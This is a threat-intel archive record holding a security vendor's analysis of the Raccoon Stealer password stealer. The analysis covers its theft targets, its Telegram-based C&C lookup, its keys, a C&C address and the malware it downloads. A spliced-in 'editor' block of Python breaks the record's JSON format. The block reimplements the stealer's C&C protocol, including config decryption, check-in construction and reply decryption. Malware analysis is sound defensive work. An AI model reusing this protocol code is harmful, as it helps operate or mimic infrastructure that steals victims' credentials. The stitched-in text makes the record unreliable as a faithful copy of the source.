{
	"id": "7616a103-b06d-493f-88b7-f2a98c356577",
	"created_at": "2026-04-06T00:09:50.650567Z",
	"updated_at": "2026-04-10T13:11:20.923438Z",
	"deleted_at": null,
	"sha1_hash": "fb27206c3d270287b3f269dce66e5c1420d4b35a",
	"title": "Raccoon Stealer: “Trash panda” abuses Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2357463,
	"plain_text": "Raccoon Stealer: “Trash panda” abuses Telegram\r\nBy Threat Research Team\r\nArchived: 2026-04-05 12:48:42 UTC\r\nWe recently came across a stealer called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the\r\nTelegram infrastructure to store and update its actual C\u0026C addresses.\r\nRaccoon Stealer is a password stealer capable of stealing not just passwords but various other types of data, including:\r\nCookies, saved logins and form data from browsers\r\nLogin credentials from email clients and messengers\r\nFiles from crypto wallets\r\nData from browser plugins and extensions\r\nArbitrary files, based on commands from the C\u0026C\r\nIn addition, it is able to download and execute arbitrary files on command from its C\u0026C. In combination with active\r\ndevelopment and promotion on underground forums, this makes Raccoon Stealer prevalent and dangerous.\r\nThe oldest samples of Raccoon Stealer we’ve seen have timestamps from the end of April 2019. Its authors have stated\r\nthe same month as the start of sales of the malware on underground forums. Since then, it has been updated many times.\r\nAccording to its authors, they fixed bugs, added features, and more.\r\nDistribution\r\nWe’ve seen Raccoon distributed via downloaders: Buer Loader and GCleaner. Based on some samples, we believe it\r\nis also being distributed in the form of fake game cheats, patches for cracked software (including hacks and mods for\r\nFortnite, Valorant, and NBA2K22), or other software. Taking into account that Raccoon Stealer is for sale, its\r\ndistribution techniques are limited only by the imagination of the end buyers. Some samples are spread unpacked, while\r\nothers are protected using Themida or malware packers. Worth noting is that some samples were packed more than five\r\ntimes in a row with the same packer!\r\nTechnical details\r\nRaccoon Stealer is written in C/C++ and built using Visual Studio.
Samples have a size of about 580-600 kB. The code\r\nquality is below average; some strings are encrypted, some are not.\r\nOnce executed, Raccoon Stealer checks the default user locale set on the infected device and won’t run if it is\r\none of the following:\r\nRussian\r\nUkrainian\r\nBelarusian\r\nKazakh\r\nKyrgyz\r\nArmenian\r\nTajik\r\nUzbek\r\nC\u0026C communications\r\nThe most interesting thing about this stealer is its communication with its C\u0026Cs. Four values are crucial for C\u0026C\r\ncommunication, and they are hardcoded in every Raccoon Stealer sample:\r\nMAIN_KEY. This value has been changed four times during the year.\r\nURLs of Telegram gates with the channel name. Gates are used so that the sample neither has to implement the complicated Telegram\r\nprotocol nor has to carry any credentials.\r\nBotID – a hexadecimal string, sent to the C\u0026C with every request.\r\nTELEGRAM_KEY – the key used to decrypt the C\u0026C address obtained from the Telegram gate.\r\nLet’s look at an example to see how it works:\r\n447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b unpacked to:\r\nf1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232:\r\n1. First of all, MAIN_KEY is decrypted. See the decryption code in the image below:\r\nhttps://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram\r\nPage 1 of 4\n\nIn this example, the MAIN_KEY is jY1aN3zZ2j. This key is used to decrypt the Telegram gate URLs and the BotID.\r\n2. Next, the sample decodes and decrypts the Telegram gate URLs. The value is stored in the sample as:\r\nRf66cjXWSDBo1vlrnxFnlmWs5Hi29V1kU8o8g8VtcKby7dXlgh1EIweq4Q9e3PZJl3bZKVJok2GgpA90j35LVd34QAiXtpeV2UZQS5VrcO7UWo0E1JOzwI0Zqrdk9jzEGQ\r\nAfter Base64 decoding it has this form:\r\nDecrypting this binary data with RC4 using MAIN_KEY gives us a string with the Telegram gates:\r\n3. The stealer then has to get its real C\u0026C.
To do so, it requests a Telegram gate, which returns an HTML page:\r\nHere you can see the Telegram channel name and its status in Base64: e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32\r\nThe prefix (always five characters) and postfix (always six characters) are removed, leaving\r\nmD/ry6GYdwNuXl10SYoVBR7/tFgp. This Base64 is then decoded to obtain the encrypted C\u0026C URL:\r\nThe TELEGRAM_KEY in this sample is the string 739b4887457d3ffa7b811ce0d03315ce, and Raccoon uses it as the RC4 key\r\nto finally decrypt the C\u0026C URL: http://91.219.236[.]18/\r\n4. Raccoon builds a query string with PC information (machine GUID and user name) and the BotID.\r\n5. The query string is encrypted with RC4 using MAIN_KEY and then Base64-encoded.\r\n6. This data is sent via POST to the C\u0026C. The response is likewise Base64-encoded and encrypted with\r\nMAIN_KEY; it is a JSON object with many parameters and looks like this:\r\nThus, the Telegram infrastructure is used to store and update the actual C\u0026C addresses. It looks quite convenient and reliable,\r\nuntil Telegram decides to take action.\r\nAnalysis\r\nThe people behind Raccoon Stealer\r\nBased on our analysis of seller messages on underground forums, we can deduce some information about the people behind\r\nthe malware. Raccoon Stealer was developed by a team; some (or maybe all) members of the team are native Russian\r\nspeakers.
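The C\u0026C bootstrap described in steps 1 to 6 of the C\u0026C communications section above, implemented as an added example. This is the editor’s code, not code from the Avast post or from the malware itself: RC4 over Base64 for the hardcoded config strings, the fixed five-character prefix and six-character postfix stripped from the Telegram channel status, RC4 under TELEGRAM_KEY for the C\u0026C URL, and RC4 under MAIN_KEY for the check-in body and the JSON reply. The query-string parameter names, the JSON field names, the C\u0026C URL, machine GUID and user name below are constructed placeholders; treating the hexadecimal TELEGRAM_KEY as its ASCII text, and assuming the reply is Base64 over RC4 ciphertext in the same order as the request, are assumptions taken from the article’s wording.

```python
import base64
import json


def rc4(key: bytes, data: bytes) -> bytes:
    # Plain RC4 (KSA + PRGA). Encryption and decryption are the same keystream XOR,
    # so every layer of the Raccoon config can be peeled with this one function.
    s = list(range(256))
    j = 0
    for i in range(256):                                  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def b64decode_lenient(text: str) -> bytes:
    # Strings copied out of a binary or a PDF often lose their trailing '=' padding.
    return base64.b64decode(text + '=' * (-len(text) % 4))


def decrypt_config_string(blob_b64: str, main_key: str) -> str:
    # Steps 1-2: a hardcoded string (Telegram gate URLs, BotID) is Base64 over RC4 under MAIN_KEY.
    return rc4(main_key.encode(), b64decode_lenient(blob_b64)).decode('latin-1')


GATE_PREFIX_LEN = 5   # characters dropped from the front of the channel status
GATE_SUFFIX_LEN = 6   # characters dropped from the end


def c2_from_gate_status(status: str, telegram_key: str) -> str:
    # Step 3: strip the fixed-length prefix/postfix, Base64-decode, RC4 under TELEGRAM_KEY (ASCII, assumed).
    inner = status[GATE_PREFIX_LEN:len(status) - GATE_SUFFIX_LEN]
    return rc4(telegram_key.encode(), b64decode_lenient(inner)).decode('latin-1')


def build_gate_status(c2_url: str, telegram_key: str, prefix: str = 'abcde', suffix: str = 'fghijk') -> str:
    # Operator side of step 3, used here only to construct test data: RC4, Base64, wrap in junk.
    enc = base64.b64encode(rc4(telegram_key.encode(), c2_url.encode())).decode()
    return prefix + enc + suffix


def build_checkin_body(machine_guid: str, user_name: str, bot_id: str, main_key: str) -> str:
    # Steps 4-5: query string with PC info and BotID, RC4 under MAIN_KEY, then Base64.
    # The parameter names are an assumption; the article names only the contents.
    query = 'machineId=' + machine_guid + '|' + user_name + '&configId=' + bot_id
    return base64.b64encode(rc4(main_key.encode(), query.encode())).decode()


def decrypt_c2_response(body_b64: str, main_key: str) -> dict:
    # Step 6: the POST reply is Base64 over RC4 under MAIN_KEY (assumed order), containing JSON.
    return json.loads(rc4(main_key.encode(), b64decode_lenient(body_b64)).decode('utf-8'))


def encrypt_c2_response(payload: dict, main_key: str) -> str:
    # Server side of step 6, used here only to construct test data.
    return base64.b64encode(rc4(main_key.encode(), json.dumps(payload).encode())).decode()


if __name__ == '__main__':
    # Keys are the ones the article reports for sample f1cfcce1...; URL, GUID, user name and JSON fields are constructed.
    main_key, telegram_key = 'jY1aN3zZ2j', '739b4887457d3ffa7b811ce0d03315ce'
    status = build_gate_status('http://203.0.113.10/', telegram_key, 'e74b2', '2f-v32')
    print('gate status :', status)
    print('C2 URL      :', c2_from_gate_status(status, telegram_key))
    body = build_checkin_body('{12345678-0000-0000-0000-000000000000}', 'victim', 'deadbeef', main_key)
    print('check-in    :', body)
    reply = encrypt_c2_response({'url': 'http://203.0.113.10/', 'example_field': ''}, main_key)
    print('C2 response :', decrypt_c2_response(reply, main_key))
    # The article's own channel status, fed through the same path, for comparison with the URL it reports.
    real_status = 'e74b2mD/ry6GYdwNuXl10SYoVBR7/tFgp2f-v32'
    print('article gate:', rc4(telegram_key.encode(), b64decode_lenient(real_status[5:-6])))
```

Run it directly to walk the constructed chain end to end; the last line pushes the article’s own gate status and TELEGRAM_KEY through the same functions so the result can be checked against http://91.219.236[.]18/. The same decrypt_config_string call applies to the 130-character gate-URL blob quoted above with MAIN_KEY, which is why the decoder tolerates missing Base64 padding.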
Messages on the forum are written in Russian, and we assume they are from former USSR countries because they\r\ntry to prevent the stealer from running on users’ machines in those countries.\r\nPossible names or nicknames of group members can be inferred from artifacts found in samples:\r\nC:\\Users\\a13xuiop1337\\\r\nC:\\Users\\David\\\r\nPrevalence\r\nRaccoon Stealer is quite prevalent: between March 3, 2021 and February 17, 2022 our systems detected more than 25,000\r\nRaccoon-related samples. We identified more than 1,300 distinct configs during that period.\r\nHere is a map showing the number of systems Avast protected from Raccoon Stealer between March 3, 2021 and February 17,\r\n2022. In this time frame, Avast blocked nearly 600,000 Raccoon Stealer attacks.\r\nThe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware\r\ndo not want to infect computers in Russia or Central Asia. We believe the attacks are spray and pray, distributing the malware\r\naround the world. It is not until it lands on a system that it begins checking the default locale; if the locale is one of the\r\nlanguages listed above, it won’t run. This explains why we detected so many attack attempts in Russia: we block the malware\r\nbefore it can run, i.e. before it even gets to the stage where it checks the device’s locale. An unprotected device in\r\nRussia whose locale is set to English, or to any other language not on the exception list, would still become infected.\r\nScreenshot with claims about not working with CIS\r\nTelegram Channels\r\nFrom the more than 1,300 distinct configs we extracted, 429 unique Telegram channels were found. Some of them were\r\nused only in a single config, others were used dozens of times.
The most used channels were:\r\njdiamond13 – 122 times\r\njjbadb0y – 44 times\r\nnixsmasterbaks2 – 31 times\r\nhellobyegain – 25 times\r\nh_smurf1kman_1 – 24 times\r\nThus, the five most used channels were found in about 19% of configs.\r\nMalware distributed by Raccoon\r\nAs mentioned previously, Raccoon Stealer is able to download and execute arbitrary files on command from the C\u0026C.\r\nWe managed to collect some of these files: 185 files with a total size of 265 MB. Some of the groups are:\r\nDownloaders – used to download and execute other files\r\nClipboard crypto stealers – replace crypto wallet addresses in the clipboard – very popular (more than 10%)\r\nWhiteBlackCrypt Ransomware\r\nServers used to download this software\r\nWe extracted the unique links to other malware from the Raccoon configs received from C\u0026Cs: 196 unique URLs. Some\r\nanalysis results:\r\n43% of URLs use the HTTP scheme, 57% HTTPS.\r\n83 domain names were used.\r\nAbout 20% of the malware was hosted on the Discord CDN.\r\nAbout 10% was served from aun3xk17k[.]space.\r\nConclusion\r\nWe will continue to monitor Raccoon Stealer’s activity, keeping an eye on new C\u0026Cs, Telegram channels, and downloaded\r\nsamples. We predict it may be used more widely by other cybercrime groups.
We assume the group behind Raccoon Stealer will\r\ncontinue to develop new features, for example support for stealing data from additional software, as well as bypasses for the\r\nprotections that software has in place.\r\nIoC\r\n447c03cc63a420c07875132d35ef027adec98e7bd446cf4f7c9d45b6af40ea2b\r\nf1cfcce14739887cc7c082d44316e955841e4559ba62415e1d2c9ed57d0c6232\r\nA group of elite researchers who like to stay under the radar.\r\nSource: https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram"
	],
	"report_names": [
		"raccoon-stealer-trash-panda-abuses-telegram"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775826680,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.pdf",
		"text": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.txt",
		"img": "https://archive.orkl.eu/fb27206c3d270287b3f269dce66e5c1420d4b35a.jpg"
	}
}